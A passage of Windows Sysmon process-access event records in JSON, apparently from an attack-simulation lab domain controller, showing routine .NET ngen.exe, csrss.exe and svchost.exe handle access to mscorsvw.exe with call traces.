08:05:34.960","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223F-5F25-0000-0010E4E90B00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001058090D00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001058090D00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.976\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001058090D00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.976","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001058090D00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010B60D0D00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010B60D0D00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010B60D0D00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010B60D0D00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010B60D0D00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010B60D0D00}","TargetProcessId":"3804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001018120D00}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001018120D00}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001018120D00}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001018120D00}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-001018120D00}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 